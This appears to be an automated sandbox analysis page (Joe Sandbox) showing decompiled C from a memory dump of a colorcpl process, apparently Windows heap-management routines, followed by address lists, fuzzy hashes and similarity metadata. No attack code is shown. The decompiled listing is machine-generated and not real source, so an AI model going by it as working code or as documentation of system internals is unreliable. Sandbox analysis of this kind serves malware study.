													_t380 =  *0x4436914; // 0x7fab0654
													_t311 =  *0x4436914; // 0x7fab0654
													_t383 =  *0x4436914; // 0x7fab0654
													_t438 = _t438 +  *((intOrPtr*)(_t383 + (( *(_t311 + (( *(_t380 + ((_t438 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + ((_t438 & 0x0000ffff) >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t438 & 0xf)) * 2));
													_t378 = _v32;
													_t238 = _v72;
													_t392 = _v76;
												}
											}
										} else {
											_v64 = _v64 + 0xffe0;
											_t438 = _v64;
										}
									}
									__eflags = _t378 - _t438;
									if(_t378 == _t438) {
										goto L37;
									} else {
										_t238 = _t438 & 0x0000ffff;
										_t359 = (_t378 & 0x0000ffff) - (_t438 & 0x0000ffff);
										__eflags = _t359;
										L33:
										__eflags = _t359;
										if(__eflags == 0) {
											_t334 = _t400;
											_v52 = _t334;
											while(1) {
												L45:
												_t274 =  *_t334 & 0x0000ffff;
												__eflags = _t274;
												if(_t274 == 0) {
													break;
												}
												while(1) {
													_t334 =  &(_t334[1]);
													_v52 = _t334;
													__eflags = _t274;
													if(_t274 == 0) {
														goto L45;
													}
													_t274 =  *_t334 & 0x0000ffff;
												}
											}
											_t328 =  &(_t334[1]);
											_v52 = _t328;
											_t275 = _a16;
											__eflags = _t275;
											if(_t275 == 0) {
												_push(_t328 - _t400 & 0xfffffffe);
												_push(_t400);
												_push(_v92);
												L90:
												_t238 = E04388C00();
												_t444 = _t444 + 0xc;
												L91:
												__eflags = _v29;
												if(_v29 != 0) {
													_t238 = E04388F40(0x44363a0, 0, 0x234);
													_t444 = _t444 + 0xc;
												}
												goto L60;
											}
											_t427 = _a20;
											__eflags = _t427 - _v80;
											if(_t427 <= _v80) {
												_t428 = _t427 + _t427;
												E043888C0(_v56, _t275, _t428);
												_t444 = _t444 + 0xc;
												_t361 = _v56 + _t428;
												_t238 = 0;
												 *_t361 = 0;
												_t362 = _t361 + 2;
												__eflags = _a20 - _v80;
												if(_a20 == _v80) {
													goto L91;
												}
												_t282 = _t328 - _t400 & 0xfffffffe;
												__eflags = _t282;
												_push(_t282);
												_push(_t400);
												_push(_t362);
												goto L90;
											}
											_t406 = _v36;
											_t284 = E0436B870(_t359,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t406);
											_t328 = _v52;
											_t368 = (_t328 - _t406 >> 1) - _v84 + _t427 + (_t328 - _t406 >> 1) - _v84 + _t427;
											_v80 = _t368;
											__eflags = _t368 - _t284;
											if(_t368 < _t284) {
												_t432 = _v56 + 2 + _t427 + _t427;
												_v88 = _v40;
												E04388C00(_t432, _v40, _t328 - _v40 & 0xfffffffe);
												 *((short*)(_t432 - 2)) = 0;
												_t238 = E043888C0(_t432 - 2 - _t427 + _t427, _a16, _t427 + _t427);
												_t444 = _t444 + 0x18;
												__eflags = _a4;
												if(_a4 == 0) {
													_t370 = _v48;
													 *((intOrPtr*)(_t370 + 0x48)) = _v36;
													_t238 = _v80;
													 *((intOrPtr*)(_t370 + 0x290)) = _v80;
													_t221 = _t370 + 0x294;
													 *_t221 =  *(_t370 + 0x294) + 1;
													__eflags =  *_t221;
												}
												__eflags = _v29;
												if(_v29 != 0) {
													_t238 = E04388F40(0x44363a0, 0, 0x234);
													_t444 = _t444 + 0xc;
												}
												_t400 = _v88;
												goto L60;
											}
											_t408 = E0436B9FA(_t368);
											_v88 = _t408;
											__eflags = _t408;
											if(_t408 == 0) {
												goto L111;
											}
											_t435 = (_v56 - _v36 >> 1) + (_v56 - _v36 >> 1);
											E043888C0(_t408, _v36, _t435);
											_t409 = _t408 + _t435;
											_t437 = _a20 + _a20;
											E043888C0(_t409, _a16, _t437);
											 *((short*)(_t409 + _t437)) = 0;
											E043888C0(_t409 + _t437 + 2, _v40, _t328 - _v40 & 0xfffffffe);
											_t444 = _t444 + 0x24;
											_t372 = _a4;
											_t299 = _v88;
											__eflags = _t372;
											if(_t372 != 0) {
												 *_t372 = _t299;
											} else {
												_t372 = _v48;
												 *((intOrPtr*)(_t372 + 0x48)) = _t299;
												 *(_t372 + 0x290) = _v80;
												_t96 = _t372 + 0x294;
												 *_t96 =  *(_t372 + 0x294) + 1;
												__eflags =  *_t96;
											}
											__eflags = _v29;
											if(_v29 != 0) {
												E04388F40(0x44363a0, 0, 0x234);
												_t444 = _t444 + 0xc;
											}
											__eflags = _v30;
											if(_v30 != 0) {
												_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
												E0434E740(_t372);
												_v30 = 0;
											}
											_t238 = E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v36);
											_t400 = _v40;
											_t328 = _v52;
											goto L60;
										}
										if(__eflags < 0) {
											__eflags = _v44 - _t328;
											if(_v44 == _t328) {
												_t238 = _v92;
												_v44 = _v92;
											}
										}
										goto L16;
									}
								}
								_t359 = _a12 - _v88;
								goto L33;
							}
							L60:
							_t342 = _v36;
							_t414 = _v44;
							goto L61;
						}
					} else {
						_t324 = 0;
						__eflags = 0;
						_t441 = _a20;
						while(1) {
							__eflags = _t324 - _t441;
							if(_t324 >= _t441) {
								goto L12;
							}
							__eflags =  *((short*)(_t340 + _t324 * 2));
							if( *((short*)(_t340 + _t324 * 2)) == 0) {
								goto L120;
							} else {
								_t324 = _t324 + 1;
								continue;
							}
						}
						goto L12;
					}
				}
			}

0x0436b1e5
0x0436b1e7
0x0436b1ec
0x0436b1f7
0x0436b1f8
0x0436b1fe
0x0436b203
0x0436b208
0x0436b20c
0x0436b212
0x0436b219
0x0436b220
0x0436b224
0x0436b228
0x0436b22d
0x043ae41b
0x043ae41b
0x0436b57d
0x0436b580
0x0436b58e
0x0436b58e
0x0436b233
0x0436b23a
0x00000000
0x0436b240
0x0436b240
0x0436b245
0x0436b249
0x0436b250
0x00000000
0x0436b25f
0x0436b25f
0x0436b260
0x00000000
0x0436b260
0x0436b250
0x0436b265
0x0436b268
0x0436b26a
0x0436b283
0x0436b289
0x0436b28c
0x0436b28f
0x0436b292
0x0436b295
0x0436b29c
0x0436b29e
0x0436b2a1
0x0436b2a4
0x0436b2a6
0x0436b76c
0x0436b76e
0x0436b771
0x0436b774
0x00000000
0x00000000
0x043ae27e
0x043ae281
0x043ae283
0x043ae296
0x043ae296
0x00000000
0x043ae285
0x043ae286
0x043ae28b
0x043ae28e
0x043ae290
0x00000000
0x00000000
0x00000000
0x043ae290
0x0436b2ac
0x0436b2ac
0x0436b2b0
0x0436b2bd
0x0436b2c2
0x0436b2c5
0x0436b2c8
0x0436b2cb
0x0436b2cb
0x0436b2d2
0x0436b2d4
0x0436b2d7
0x0436b2d9
0x0436b2dc
0x0436b2de
0x0436b55c
0x0436b55c
0x0436b55e
0x0436b709
0x0436b70b
0x0436b70b
0x0436b564
0x0436b566
0x0436b591
0x0436b595
0x00000000
0x00000000
0x0436b597
0x0436b599
0x043ae3e5
0x043ae3e8
0x043ae3ee
0x043ae3f5
0x0436b5f8
0x0436b5f8
0x0436b5fb
0x0436b5fd
0x0436b79b
0x0436b7ab
0x0436b7b3
0x0436b7ba
0x0436b7bf
0x0436b7c2
0x0436b7c5
0x0436b7c7
0x0436b7d5
0x0436b7da
0x0436b7da
0x0436b7dd
0x0436b7df
0x0436b7e7
0x0436b7ea
0x0436b7ed
0x0436b7f3
0x0436b7fb
0x0436b803
0x0436b805
0x0436b808
0x0436b80a
0x0436b810
0x0436b813
0x0436b816
0x00000000
0x0436b81c
0x0436b81c
0x0436b822
0x0436b825
0x0436b828
0x0436b82e
0x00000000
0x0436b82e
0x0436b816
0x0436b60a
0x0436b60c
0x0436b60f
0x0436b611
0x043ae35f
0x043ae35f
0x00000000
0x043ae35f
0x0436b617
0x0436b619
0x043ae3fc
0x0436b61f
0x0436b624
0x0436b624
0x0436b626
0x0436b62e
0x0436b633
0x0436b636
0x0436b636
0x0436b63c
0x0436b642
0x0436b649
0x0436b654
0x0436b65b
0x0436b661
0x0436b667
0x0436b66e
0x0436b679
0x0436b67d
0x0436b680
0x0436b683
0x0436b685
0x043ae405
0x043ae408
0x0436b68b
0x0436b693
0x0436b69b
0x0436b69e
0x0436b6a0
0x0436b6ae
0x0436b6b3
0x0436b6a0
0x0436b6b6
0x0436b6b9
0x0436b6bc
0x0436b6be
0x0436b77f
0x0436b6c4
0x0436b6c4
0x0436b6c7
0x0436b6cd
0x0436b6d3
0x0436b6d3
0x0436b6d3
0x0436b6d3
0x0436b6d9
0x0436b6dd
0x0436b6e5
0x0436b6e8
0x0436b6ed
0x0436b6ed
0x0436b6ff
0x00000000
0x0436b6ff
0x0436b59f
0x0436b5a2
0x0436b5a2
0x0436b5a2
0x0436b5a5
0x0436b5a8
0x00000000
0x00000000
0x0436b5b0
0x0436b5b0
0x0436b5b3
0x0436b5b6
0x0436b5b9
0x00000000
0x00000000
0x0436b5bb
0x0436b5bb
0x0436b5b0
0x0436b5c3
0x0436b5d7
0x0436b5d9
0x0436b5e3
0x0436b5e8
0x0436b5e8
0x0436b5eb
0x0436b5f2
0x0436b5f5
0x00000000
0x0436b568
0x0436b568
0x0436b568
0x0436b56b
0x0436b56b
0x0436b56e
0x0436b56e
0x0436b575
0x0436b57a
0x00000000
0x0436b57a
0x0436b566
0x0436b2e4
0x0436b2e7
0x0436b2f0
0x0436b2f0
0x0436b2f0
0x0436b2f3
0x00000000
0x00000000
0x0436b2f9
0x0436b2fb
0x0436b2fe
0x0436b2fe
0x0436b300
0x0436b303
0x0436b303
0x0436b306
0x0436b309
0x0436b30c
0x0436b30f
0x00000000
0x00000000
0x0436b311
0x0436b314
0x00000000
0x00000000
0x0436b31a
0x0436b31c
0x0436b31f
0x0436b31f
0x0436b322
0x0436b325
0x0436b327
0x0436b330
0x0436b330
0x0436b333
0x00000000
0x00000000
0x0436b335
0x0436b338
0x0436b338
0x0436b33f
0x0436b33f
0x0436b341
0x0436b343
0x0436b346
0x00000000
0x0436b346
0x0436b349
0x0436b34c
0x0436b34f
0x0436b352
0x0436b355
0x0436b358
0x0436b35b
0x0436b35d
0x0436b35f
0x0436b35f
0x0436b363
0x0436b366
0x0436b370
0x0436b370
0x0436b372
0x00000000
0x00000000
0x0436b37b
0x0436b381
0x0436b384
0x0436b388
0x0436b38c
0x0436b390
0x0436b393
0x0436b3cc
0x0436b3cc
0x0436b3cf
0x0436b3d2
0x0436b3d5
0x0436b3d8
0x00000000
0x0436b3d8
0x0436b395
0x0436b399
0x0436b3f4
0x0436b3f8
0x043ae29f
0x043ae2a5
0x00000000
0x00000000
0x043ae2ab
0x043ae2b2
0x043ae2b6
0x00000000
0x00000000
0x043ae2c4
0x043ae2d8
0x043ae2ea
0x043ae2f0
0x043ae2f4
0x043ae2f7
0x0436b409
0x0436b409
0x00000000
0x0436b409
0x0436b3fe
0x0436b3fe
0x0436b3fe
0x0436b405
0x00000000
0x0436b405
0x0436b39b
0x0436b39b
0x0436b39f
0x0436b3dd
0x0436b3e1
0x043ae2ff
0x043ae305
0x043ae30b
0x043ae312
0x043ae316
0x043ae324
0x043ae338
0x043ae346
0x043ae34c
0x043ae350
0x043ae354
0x043ae357
0x043ae357
0x043ae316
0x0436b3e7
0x0436b3e7
0x0436b3ee
0x0436b3ee
0x0436b3e1
0x0436b3a1
0x0436b3a4
0x00000000
0x0436b3a6
0x0436b3a6
0x0436b3ac
0x0436b3ac
0x0436b3ae
0x0436b3ae
0x0436b3b0
0x0436b417
0x0436b419
0x0436b420
0x0436b420
0x0436b420
0x0436b423
0x0436b426
0x00000000
0x00000000
0x0436b430
0x0436b430
0x0436b433
0x0436b436
0x0436b439
0x00000000
0x00000000
0x0436b43b
0x0436b43b
0x0436b430
0x0436b440
0x0436b443
0x0436b446
0x0436b449
0x0436b44b
0x0436b78d
0x0436b78e
0x0436b78f
0x0436b741
0x0436b741
0x0436b746
0x0436b749
0x0436b749
0x0436b74d
0x0436b75f
0x0436b764
0x0436b764
0x00000000
0x0436b74d
0x0436b451
0x0436b454
0x0436b457
0x0436b713
0x0436b71a
0x0436b71f
0x0436b725
0x0436b727
0x0436b729
0x0436b72c
0x0436b732
0x0436b735
0x00000000
0x00000000
0x0436b73b
0x0436b73b
0x0436b73e
0x0436b73f
0x0436b740
0x00000000
0x0436b740
0x0436b45d
0x0436b46c
0x0436b471
0x0436b47f
0x0436b481
0x0436b484
0x0436b486
0x043ae374
0x043ae37b
0x043ae386
0x043ae393
0x043ae39d
0x043ae3a2
0x043ae3a5
0x043ae3a9
0x043ae3ab
0x043ae3b1
0x043ae3b4
0x043ae3b7
0x043ae3bd
0x043ae3bd
0x043ae3bd
0x043ae3bd
0x043ae3c3
0x043ae3c7
0x043ae3d5
0x043ae3da
0x043ae3da
0x043ae3dd
0x00000000
0x043ae3dd
0x0436b491
0x0436b493
0x0436b496
0x0436b498
0x00000000
0x00000000
0x0436b4a8
0x0436b4ae
0x0436b4b6
0x0436b4bb
0x0436b4c2
0x0436b4ce
0x0436b4df
0x0436b4e4
0x0436b4e7
0x0436b4ea
0x0436b4ed
0x0436b4ef
0x0436b794
0x0436b4f5
0x0436b4f5
0x0436b4f8
0x0436b4fe
0x0436b504
0x0436b504
0x0436b504
0x0436b504
0x0436b50a
0x0436b50e
0x0436b51c
0x0436b521
0x0436b521
0x0436b524
0x0436b528
0x0436b530
0x0436b533
0x0436b538
0x0436b538
0x0436b54b
0x0436b550
0x0436b553
0x00000000
0x0436b553
0x0436b3b2
0x0436b3b8
0x0436b3bb
0x0436b3c1
0x0436b3c4
0x0436b3c4
0x0436b3bb
0x00000000
0x0436b3b2
0x0436b3a4
0x0436b412
0x00000000
0x0436b412
0x0436b556
0x0436b556
0x0436b559
0x00000000
0x0436b559
0x0436b26c
0x0436b26c
0x0436b26c
0x0436b26e
0x0436b271
0x0436b271
0x0436b273
0x00000000
0x00000000
0x0436b275
0x0436b27a
0x00000000
0x0436b280
0x0436b280
0x00000000
0x0436b280
0x0436b27a
0x00000000
0x0436b271
0x0436b26a

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0ffc8e58276f91c9bba22fc8c45f3e072fabb9148197c0f7af08de6b57213f6
Instruction ID: 3de97e7252888d116569b346ded06f281749fe665f574453336417e6d505493a
Opcode Fuzzy Hash: b0ffc8e58276f91c9bba22fc8c45f3e072fabb9148197c0f7af08de6b57213f6
Instruction Fuzzy Hash: B8327F71E0022ADBDB14DF98D895BAEBBB5FF44704F185029E806AB394E735B911CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04352760 Relevance: .6, Instructions: 605
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E04352760(signed int __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v16;
				signed char _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				signed char _v100;
				signed char _v101;
				signed int _v108;
				signed char _v112;
				signed char _v116;
				signed int _v120;
				signed char _v124;
				signed char _v128;
				signed int _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t226;
				signed int _t229;
				signed int _t232;
				signed int _t233;
				void* _t234;
				intOrPtr _t237;
				signed int _t242;
				signed int _t245;
				signed char _t246;
				intOrPtr _t250;
				signed short _t254;
				signed int _t256;
				signed char _t260;
				void* _t264;
				signed char _t266;
				intOrPtr* _t268;
				signed char _t271;
				signed int _t272;
				signed short _t275;
				signed short _t278;
				signed short _t279;
				signed int _t284;
				signed short _t285;
				signed int _t287;
				void* _t288;
				signed short _t289;
				signed int _t291;
				void* _t292;
				signed char _t297;
				signed short _t299;
				signed char _t301;
				signed short _t320;
				signed short _t322;
				signed short _t323;
				signed int _t325;
				void* _t326;
				signed char _t330;
				signed int _t334;
				signed int _t335;
				void* _t337;
				signed char _t343;
				signed int _t345;
				intOrPtr _t352;
				signed int _t361;
				signed char _t363;
				signed int _t364;
				signed char _t365;
				unsigned int _t370;
				signed int _t374;
				signed char _t378;
				void* _t385;
				signed int _t387;
				signed char _t388;
				signed int _t390;
				signed int _t391;
				signed short _t396;
				signed int _t398;
				signed char _t399;
				unsigned int _t407;
				unsigned int _t409;
				unsigned int _t411;
				unsigned int _t421;
				unsigned int _t424;
				void* _t429;
				signed char _t430;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				void* _t439;
				void* _t445;

				_t386 = __edx;
				_t337 = _t445;
				_v8 =  *((intOrPtr*)(_t337 + 4));
				_t443 = (_t445 - 0x00000008 & 0xfffffff8) + 4;
				_v16 =  *0x443b370 ^ (_t445 - 0x00000008 & 0xfffffff8) + 0x00000004;
				_t437 = __ecx;
				_v124 =  *(_t337 + 0xc);
				_t339 =  *(_t337 + 8);
				_t226 =  *(_t337 + 0x10);
				_v112 = _t339;
				_v132 = _t226;
				_v120 = 0;
				_v116 = 0;
				_t428 =  *(_t337 + 0x14);
				_v128 = _t428;
				if(_t339 == 0) {
					 *( *[fs:0x18] + 0xbf4) = 0;
					 *((intOrPtr*)( *[fs:0x18] + 0x34)) = E0436ABA0(0);
					L150:
					_t229 = 0;
					L19:
					_pop(_t429);
					_pop(_t439);
					return E04384B50(_t229, _t337, _v16 ^ _t443, _t386, _t429, _t439);
				}
				if( *((intOrPtr*)(__ecx + 8)) == 0xddeeddee) {
					_t387 = E043ED8D2(__edx);
					_t232 =  *(__ecx + 0xb0);
					_v108 = _t387;
					__eflags = _t232;
					if(_t232 != 0) {
						_t352 =  *[fs:0x18];
						__eflags = _t232 -  *((intOrPtr*)(_t352 + 0x24));
						if(_t232 ==  *((intOrPtr*)(_t352 + 0x24))) {
							_t390 = _t387 | 0x00000001;
							__eflags = _t390;
							_v108 = _t390;
						}
					}
					__eflags =  *0x44338c0 & 0x00000002;
					_t430 = _v112;
					_t343 = _t430;
					if(( *0x44338c0 & 0x00000002) == 0) {
						_t233 = 0;
						__eflags = 0;
					} else {
						_t233 =  *((intOrPtr*)(_t430 - 8));
						_t343 = _t343 - _t233;
					}
					_t388 = _v108;
					_v120 = _t233;
					_t234 = _t233 + _v124;
					__eflags = _t234 - _v124;
					if(_t234 >= _v124) {
						_t345 = E0440970B(_t437, _t388, _t343, _t234, _v132, _v128);
						_v116 = _t345;
						__eflags = _t345;
						if(_t345 == 0) {
							goto L33;
						}
						__eflags = _t345 - 0xffffffff;
						if(_t345 == 0xffffffff) {
							goto L33;
						} else {
							__eflags =  *0x44338c0 & 0x00000002;
							_t386 = _v120;
							if(( *0x44338c0 & 0x00000002) != 0) {
								 *(_t345 + _t386 - 8) = _t386;
								_t246 = _t345 + _t386;
								__eflags = _t386 - 8;
								if(_t386 > 8) {
									 *_t345 = _t386;
								}
								_v116 = _t246;
							}
							_t245 = _v132;
							__eflags = _t245;
							if(_t245 != 0) {
								 *_t245 =  *_t245 - _t386;
							}
							goto L37;
						}
					} else {
						_t345 = 0;
						__eflags = 0;
						L33:
						asm("sbb ecx, ecx");
						_t55 = ( ~_t345 & 0xffffffee) - 0x3fffffe9; // -1073741801
						_t386 = _t55;
						_v128 = _t386;
						_v116 = 0;
						 *( *[fs:0x18] + 0xbf4) = _t386;
						_t237 = E0436ABA0(_t386);
						__eflags = _v108;
						 *((intOrPtr*)( *[fs:0x18] + 0x34)) = _t237;
						if(_v108 < 0) {
							L35:
							_v100 = _v128;
							_v80 = _v124;
							_push( &_v100);
							_v92 = 0;
							_v84 = 1;
							_v96 = 0;
							_v88 = L04398A60;
							L04398A60(0, _t386);
							L36:
							_t430 = _v112;
							L37:
							_t242 = E04353C20(_t437);
							__eflags = _t242;
							_t229 = _v116;
							if(_t242 != 0) {
								__eflags = _t229;
								if(_t229 != 0) {
									E043FE8B1(_t437, _t430);
									_t386 = _v116;
									E043FDF93(_t437, _v116);
									_t229 = _v116;
								}
							}
							goto L19;
						}
						__eflags =  *(_t437 + 0xc);
						if( *(_t437 + 0xc) >= 0) {
							goto L36;
						}
						goto L35;
					}
				}
				if(_t226 != 0) {
					 *_t226 = 0;
				}
				if(_t428 != 0) {
					 *_t428 = 0;
				}
				_v108 = _t386;
				if(( *(_t437 + 0x44) & 0x01000000) != 0) {
					_t229 = E043EFDF4(_t337, _t437, _t386, _t428, _t437, __eflags, _t339, _v124);
					goto L19;
				} else {
					if( *0x443373c != 0) {
						L8:
						if(( *(_t437 + 0x48) & 0x00000001) != 0) {
							_t386 = _t339;
							_t432 = E0433A4D2(_t337, _t437, _t339, _t428, _t437, __eflags);
							L12:
							_t339 = _v112;
							L13:
							if(_t432 == 0) {
								_t433 = 0xc0000005;
								L148:
								 *( *[fs:0x18] + 0xbf4) = _t433;
								_t250 = E0436ABA0(_t433);
								__eflags = _v108 & 0x00000004;
								 *((intOrPtr*)( *[fs:0x18] + 0x34)) = _t250;
								if((_v108 & 0x00000004) != 0) {
									_v80 = _v124;
									_push( &_v100);
									_v100 = _t433;
									_v92 = 0;
									_v84 = 1;
									_v96 = 0;
									_v88 = L04398A60;
									L04398A60(_t339, _t386);
								}
								goto L150;
							}
							if( *((char*)(_t339 - 1)) == 5) {
								__eflags =  *(_t432 + 7);
								if(__eflags >= 0) {
									__eflags =  *(_t437 + 0x4c);
									if( *(_t437 + 0x4c) == 0) {
										L61:
										__eflags =  *(_t432 + 7);
										if( *(_t432 + 7) >= 0) {
											__eflags =  *(_t437 + 0x4c);
											if( *(_t437 + 0x4c) == 0) {
												_t254 =  *_t432 & 0x0000ffff;
											} else {
												_t323 =  *_t432;
												__eflags =  *(_t437 + 0x4c) & _t323;
												if(( *(_t437 + 0x4c) & _t323) != 0) {
													_t323 = _t323 ^  *(_t437 + 0x50);
													__eflags = _t323;
												}
												_t254 = _t323 & 0x0000ffff;
											}
										} else {
											_t421 = _t432 >> 0x00000003 ^  *_t432 ^ _t437 ^  *0x4436964;
											__eflags = _t421;
											if(_t421 == 0) {
												_t325 = _t432 - (_t421 >> 0xd);
												__eflags = _t325;
												_t326 =  *_t325;
											} else {
												_t326 = 0;
											}
											_t254 =  *((intOrPtr*)(_t326 + 0x14));
										}
										__eflags =  *(_t432 + 7) - 4;
										_t256 = _t254 & 0xffff;
										_v128 = _t256;
										if( *(_t432 + 7) != 4) {
											_t391 = _t256 * 8;
										} else {
											__eflags =  *(_t437 + 0x4c);
											if( *(_t437 + 0x4c) == 0) {
												_t320 =  *_t432 & 0x0000ffff;
											} else {
												_t322 =  *_t432;
												__eflags =  *(_t437 + 0x4c) & _t322;
												if(( *(_t437 + 0x4c) & _t322) != 0) {
													_t322 = _t322 ^  *(_t437 + 0x50);
													__eflags = _t322;
												}
												_t320 = _t322 & 0x0000ffff;
											}
											_t391 =  *((intOrPtr*)(_t432 - 8)) - (_t320 & 0x0000ffff) + _v128;
										}
										__eflags = _t391 + _t432 - _t339;
										if(_t391 + _t432 >= _t339) {
											L84:
											__eflags = _v108 & 0x3c000102;
											_v116 =  *(_t339 - 8);
											if((_v108 & 0x3c000102) != 0) {
												goto L15;
											}
											_t271 =  *((intOrPtr*)(_t339 - 1));
											__eflags = _t271 - 5;
											if(_t271 != 5) {
												__eflags = _t271 & 0x00000040;
												if((_t271 & 0x00000040) == 0) {
													_t396 = 0;
													__eflags = 0;
												} else {
													_t396 = (_t271 & 0x3f) << 0x00000003 & 0x0000ffff;
													_t271 =  *((intOrPtr*)(_t339 - 1));
												}
											} else {
												_t396 = ( *(_t339 - 2) & 0x000000ff) << 0x00000003 & 0x0000ffff;
												_t271 =  *((intOrPtr*)(_t339 - 1));
											}
											_t361 = _t396 & 0x0000ffff;
											_v120 = _t396;
											_v132 = _t361;
											_t339 = _t361 + _v124;
											_v128 = _t339;
											_t386 = _v112 - 8;
											__eflags = _t339 - _v124;
											if(_t339 < _v124) {
												L147:
												_t433 = 0xc0000017;
												goto L148;
											} else {
												_v124 = _t339;
												__eflags = _t271 - 5;
												if(_t271 != 5) {
													_t398 = 0;
													__eflags = 0;
												} else {
													_t398 = _t386 - (( *(_t386 + 6) & 0x000000ff) << 3) + 8;
												}
												_t339 = _v116;
												_t386 = _t437;
												_t272 = E043E78DE(_v116, _t437, _v112, 5, _t398);
												__eflags = _t272;
												if(_t272 >= 0) {
													_t363 =  *(_t432 + 7);
													__eflags = _t363 - 4;
													if(_t363 != 4) {
														__eflags = _t363 - 5;
														if(_t363 != 5) {
															__eflags = _t363 & 0x00000040;
															if((_t363 & 0x00000040) == 0) {
																__eflags = (_t363 & 0x0000003f) - 0x3f;
																if((_t363 & 0x0000003f) == 0x3f) {
																	__eflags = _t363;
																	if(_t363 >= 0) {
																		__eflags =  *(_t437 + 0x4c);
																		if( *(_t437 + 0x4c) == 0) {
																			_t275 =  *_t432 & 0x0000ffff;
																		} else {
																			_t289 =  *_t432;
																			__eflags =  *(_t437 + 0x4c) & _t289;
																			if(( *(_t437 + 0x4c) & _t289) != 0) {
																				_t289 = _t289 ^  *(_t437 + 0x50);
																				__eflags = _t289;
																			}
																			_t275 = _t289 & 0x0000ffff;
																		}
																	} else {
																		_t370 = _t432 >> 0x00000003 ^  *_t432 ^ _t437 ^  *0x4436964;
																		__eflags = _t370;
																		if(_t370 == 0) {
																			_t291 = _t432 - (_t370 >> 0xd);
																			__eflags = _t291;
																			_t292 =  *_t291;
																		} else {
																			_t292 = 0;
																		}
																		_t275 =  *((intOrPtr*)(_t292 + 0x14));
																	}
																	_t364 =  *(_t432 + (_t275 & 0xffff) * 8 - 4);
																} else {
																	_t364 = _t363 & 0x3f;
																}
															} else {
																_t364 =  *(_t432 + 4 + (_t363 & 0x3f) * 8) & 0x0000ffff;
															}
														} else {
															_t364 =  *(_t437 + 0x54) & 0x0000ffff ^  *(_t432 + 4) & 0x0000ffff;
														}
														_t399 =  *(_t432 + 7);
														_v101 = _t399;
														__eflags = _t399;
														if(_t399 >= 0) {
															__eflags =  *(_t437 + 0x4c);
															if( *(_t437 + 0x4c) == 0) {
																_t278 =  *_t432 & 0x0000ffff;
															} else {
																_t285 =  *_t432;
																__eflags =  *(_t437 + 0x4c) & _t285;
																if(( *(_t437 + 0x4c) & _t285) != 0) {
																	_t285 = _t285 ^  *(_t437 + 0x50);
																	__eflags = _t285;
																}
																_t278 = _t285 & 0x0000ffff;
															}
														} else {
															_t407 = _t432 >> 0x00000003 ^  *_t432 ^ _t437 ^  *0x4436964;
															__eflags = _t407;
															if(_t407 == 0) {
																_t287 = _t432 - (_t407 >> 0xd);
																__eflags = _t287;
																_t288 =  *_t287;
															} else {
																_t288 = 0;
															}
															_t278 =  *((intOrPtr*)(_t288 + 0x14));
															_t399 = _v101;
														}
														_t365 = _t364 - _v132;
														_t279 = _t278 & 0x0000ffff;
														__eflags = _t365 - 0x3f;
														if(_t365 >= 0x3f) {
															 *(_t432 + (_t279 & 0x0000ffff) * 8 - 4) = _t365;
															_t284 = (_t399 >> 0x0000001f & 0x00000080) + 0x3f;
															__eflags = _t284;
															 *(_t432 + 7) = _t284;
														} else {
															 *(_t432 + 7) = _t399 >> 0x00000007 & 0x00000080 | _t365;
														}
													} else {
														_t374 = _v108;
														_t297 =  *(_t437 + 0x44) | _t374;
														__eflags = _t297 & 0x00000001;
														if((_t297 & 0x00000001) == 0) {
															E0434FED0( *((intOrPtr*)(_t437 + 0xc8)));
															_t374 = _v108;
														}
														__eflags =  *(_t437 + 0x4c);
														if( *(_t437 + 0x4c) != 0) {
															_t411 =  *(_t437 + 0x50) ^  *_t432;
															 *_t432 = _t411;
															_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
															__eflags = _t411 >> 0x18 - _t378;
															if(__eflags != 0) {
																_push(_t378);
																E043FD646(_t337, _t437, _t432, _t432, _t437, __eflags);
															}
															_t374 = _v108;
														}
														_t299 =  *_t432 - _v120;
														 *_t432 = _t299;
														__eflags =  *(_t437 + 0x4c);
														_t409 = _t299 & 0x0000ffff;
														if( *(_t437 + 0x4c) != 0) {
															 *(_t432 + 3) = _t409 >> 0x00000008 ^  *(_t432 + 2) ^ _t409;
															 *_t432 =  *_t432 ^  *(_t437 + 0x50);
															__eflags =  *_t432;
														}
														_t301 =  *(_t437 + 0x44) | _t374;
														__eflags = _t301 & 0x00000001;
														if((_t301 & 0x00000001) == 0) {
															_push( *((intOrPtr*)(_t437 + 0xc8)));
															E0434E740(_t374);
														}
													}
													_t188 = _t432 + 8; // 0xddeeddf6
													_t339 = _t188;
													_v112 = _t188;
													goto L15;
												} else {
													_t433 = 0xc0000005;
													goto L148;
												}
											}
										} else {
											L80:
											_v101 = 0;
											L81:
											_t386 = _t437;
											_t339 = 3;
											E04405FED(3, _t437, _t432, 3, 0, 0);
											__eflags = _v101;
											if(_v101 != 0) {
												_t339 = _v112;
												goto L84;
											}
											_t433 = 0xc000000d;
											goto L148;
										}
									}
									_t424 =  *(_t437 + 0x50) ^  *_t432;
									__eflags = _t424 >> 0x18 - (_t424 >> 0x00000010 ^ _t424 >> 0x00000008 ^ _t424);
									_t339 = _v112;
									if(_t424 >> 0x18 != (_t424 >> 0x00000010 ^ _t424 >> 0x00000008 ^ _t424)) {
										goto L80;
									}
									goto L61;
								}
								_t330 = E04401F59(_t337, _t437, _t432, _t432, _t437, __eflags);
								_t339 = _v112;
								_v101 = _t330;
								__eflags = _t330;
								if(_t330 != 0) {
									goto L61;
								}
								goto L81;
							}
							L15:
							_t386 = _v108 | 0x00000002;
